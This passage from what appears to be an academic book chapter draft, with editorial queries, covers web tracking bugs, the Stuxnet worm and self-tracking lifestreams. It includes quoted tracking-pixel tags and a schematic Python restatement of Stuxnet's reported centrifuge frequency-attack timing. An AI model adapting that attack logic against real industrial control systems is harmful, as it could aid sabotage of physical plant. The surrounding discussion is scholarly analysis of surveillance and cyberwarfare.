&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a. Advertiser: A company sponsoring an advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b. Exchange: A provider of a marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media] &lt;br /&gt;
*c. Network: A broker and often technology provider connecting advertisers and publishers (website operators). Example: [http://www.burstmedia.com/ Burst Media] &lt;br /&gt;
*d. Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
2. '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a. Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via an exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b. Offline Data Aggregator: Collects data from a range of offline sources and provides it to advertisers directly or via an exchange. Example: [http://www.experian.com/ Experian] &lt;br /&gt;
*c. Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d. Research: Collects data for market research purposes where no ads are served through this data. Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e. Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f. Retargeter: Provider of technologies that allow publishers to identify their visitors when they place ads on third-party sites. Example: [http://www.fetchback.com/ Fetchback]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
3. '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a. Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media] &lt;br /&gt;
*b. Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges. SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld] &lt;br /&gt;
*c. Ad Server: Technology that delivers and tracks advertisements independently of the website where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART] &lt;br /&gt;
*d. Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
4. '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a. Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b. Online Privacy: Technology providers that deliver information and transparency to consumers on how third-party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&lt;br /&gt;
&lt;br /&gt;
[[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] ''Image 1: Display Advertising Technology Landscape (Luma, 2010)'' &lt;br /&gt;
&lt;br /&gt;
Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010).&lt;/blockquote&gt; &lt;br /&gt;
Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs form part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto, and later confirmed in testimony to a U.S. House of Representatives subcommittee that it was ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid attracting too much unwanted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header, and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). One can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). &lt;br /&gt;
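&lt;br /&gt;
Technically, the proposal is tiny: the browser attaches a single extra header to each request, and everything else depends on the goodwill of the server. A minimal sketch (Python, standard library; the URL is a placeholder, and the server's response to the header is exactly what is not guaranteed): &lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;
# The entire client side of 'do not track' is one HTTP header.
import urllib.request

req = urllib.request.Request('http://example.com/',
                             headers={'DNT': '1'})  # 1 = opt out of tracking
with urllib.request.urlopen(req) as resp:
    # nothing obliges the server to honour the preference,
    # or even to acknowledge that it has seen it
    print(resp.status)
&lt;/pre&gt;
&lt;br /&gt;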
&lt;br /&gt;
One of the newer, and perhaps indicative, directions of travel for these web bugs is [http://www.persianstat.ir/ PersianStat], an Iranian web tracking and data analytics service which claims to keep 'an eye on 1091622 websites'; it shows that this new code ecology is not a purely Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;that 73 percent of Americans said they would 'not be okay' with being tracked (because it would be an invasion of privacy)… Only 23 percent said they'd be 'okay' with tracking (because it would lead to better and more personalized search results)…Despite all those high-percentage objections to the idea of being tracked, less than half of the people surveyed -- 38 percent -- said they knew of ways to control the data collected about them. (Garber, 2012; Pew, 2012)&lt;/blockquote&gt; &lt;br /&gt;
This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent to which users are just not aware of the subterranean depths of their computational devices and the ability of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). This is an issue helpfully illustrated by the next case study, of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name ‘Stuxnet’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’: the first part, 'stu', comes from the (.stub) file mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, such as a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b)&lt;/blockquote&gt; &lt;br /&gt;
The Stuxnet worm works by undertaking a very complex stealth infection, and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise the fact that it is actually gently causing the centrifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so that an infected system does not exhibit abnormal behavior and therefore does not raise the alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotage effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010). A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Associated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&lt;blockquote&gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&lt;/blockquote&gt; &lt;br /&gt;
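&lt;br /&gt;
The logic Zetter describes is, at bottom, a timed state machine, and can be restated schematically. The sketch below is purely illustrative and not functional malware: set_frequency() is a hypothetical stand-in for the PLC commands, and only the frequencies and durations are taken from the analysis quoted above. &lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;
# Schematic restatement of the reported attack sequence (Zetter, 2011).
# set_frequency() is a hypothetical placeholder, not a real PLC call.
import itertools, time

NOMINAL = 1064  # Hz, the nominal operating frequency

def set_frequency(hz):
    print('frequency converter set to', hz, 'Hz')

# alternate between an over-speed attack and a near-stall attack,
# lying dormant for roughly 27 days in between
for freq, minutes in itertools.cycle([(1410, 15), (2, 50)]):
    time.sleep(27 * 24 * 3600)  # dormant; operators see replayed 'normal' data
    set_frequency(freq)         # 1,410 Hz over-stresses rotors; 2 Hz near-stalls
    time.sleep(minutes * 60)
    set_frequency(NOMINAL)      # restore, leaving only cumulative fatigue
&lt;/pre&gt;
&lt;br /&gt;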
Stuxnet disguises all of this activity by overriding the data control systems, sending commands that disable the warning and safety controls which would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general-purpose attack, but is designed to unload its digital warheads under specific conditions against a specific target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation that a state would have been required to develop it, given the complexities involved in testing such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexity and structure of the worm are such that at least thirty people would have had to work on it simultaneously to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, one using a set of techniques that are neither public nor known to the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) systems and PLCs (Programmable Logic Controllers), this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did’ (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) the ability to identify its target precisely, using a number of software-based markers that give away the physical identity of the location. Indeed, the ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to effect a stealth infection of the computer system that would fool the operators of the plant (the ‘man-in-the-middle attack’ described above). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of the rotors, leading to cracks and failures; the second, larger warhead, 417, manipulated valves in the centrifuge cascades and faked industrial process control sensor signals by modeling the centrifuges, which were grouped into 164 cascades (Langner, 2011). Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&lt;/blockquote&gt; &lt;br /&gt;
The hypothesis about the origin of the name Stuxnet emerged from an analysis of the approximately 15,000 lines of programming code. This analysis was a close reading and reconstruction of the programming logic: the machine code was disassembled and then, as far as possible, converted back into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what it was doing (Langner, 2011). As part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see Table 1). &lt;br /&gt;
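&lt;br /&gt;
The first step of such a reconstruction is mundane: before any disassembly, analysts routinely sweep a binary for printable strings, which is how artefacts such as the 'myrtus' build path come to light. A toy version of that sweep (Python; the filename is a placeholder): &lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;
# A toy 'strings' sweep: list printable-ASCII runs in a binary image
# and grep them for a marker. 'suspect.bin' is a placeholder filename.
import re

def strings(path, min_len=6):
    data = open(path, 'rb').read()
    # runs of printable ASCII at least min_len bytes long
    pattern = rb'[ -~]{%d,}' % min_len
    return [s.decode('ascii') for s in re.findall(pattern, data)]

for s in strings('suspect.bin'):
    if 'myrtus' in s.lower():
        print(s)  # e.g. a debug path left behind by the build environment
&lt;/pre&gt;
&lt;br /&gt;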
&lt;br /&gt;
&lt;br /&gt;
[[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran - 52.2% &lt;br /&gt;
**Indonesia - 17.4% &lt;br /&gt;
**India - 11.3% &lt;br /&gt;
**Pakistan - 3.6% &lt;br /&gt;
**Uzbekistan - 2.6% &lt;br /&gt;
**Russia - 2.1% &lt;br /&gt;
**Kazakhstan - 1.3% &lt;br /&gt;
**Rest of World - 9.4%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Clearly, this kind of attack could be mobilized against targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open, it is relatively trivial to decode it and so learn, in a very short time, techniques that would otherwise have taken many years to develop. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit one whose purpose is linked to the collection of data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&lt;/blockquote&gt; &lt;br /&gt;
The increasing capacity of code and software, via computational devices, to covertly monitor, control and mediate, both positively and negatively, is not just a matter of interventions that deceive the human and non-human actors who make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems, as part of the notion of lifestreams, and more particularly of the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
The growth in the use of self-monitoring technologies is called lifestreaming, or the notion of the quantified self.[11] These practices have grown in recent years alongside the expansion of ‘real-time streams’ platforms such as Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', which argues that the: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;blockquote&gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&lt;/blockquote&gt; &lt;br /&gt;
This phenomenon of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. It closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;blockquote&gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&lt;/blockquote&gt; &lt;br /&gt;
Lifestreams were originally an idea of David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
